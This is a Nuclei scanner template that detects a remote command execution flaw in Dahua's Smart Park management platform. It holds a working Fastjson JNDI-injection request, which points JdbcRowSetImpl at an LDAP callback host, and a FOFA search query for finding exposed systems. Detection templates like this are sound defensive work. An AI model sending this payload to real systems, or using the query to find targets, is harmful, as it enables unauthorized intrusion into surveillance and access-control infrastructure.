37 lines
1.3 KiB
YAML
37 lines
1.3 KiB
YAML
id: dahua-wpms-rce
|
|
|
|
info:
|
|
name: Dahua Smart Park Integrated Management Platform - Remote Command Execution
|
|
author: DhiyaneshDK
|
|
severity: critical
|
|
description: Dahua Smart Park Integrated Management Platform is vulnerable to RCE.
|
|
reference:
|
|
- https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/dahua-zhyq-deleteftp-rce.py
|
|
metadata:
|
|
max-request: 1
|
|
fofa-query: body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""
|
|
tags: rce,dahua,wpms
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "autoCommit"
|
|
- "set property error"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
# digest: 4b0a00483046022100cef246cfd423f5c3e5a54632ae04d07501a82ffc6fbbb32fbb1cdeaf179be6c8022100ad66230d72ffbcae3ddabeffafd722ebb2a766e4cf3a2dfd4fabeb7390761df9:922c64590222798bb761d5b6d8e72950 |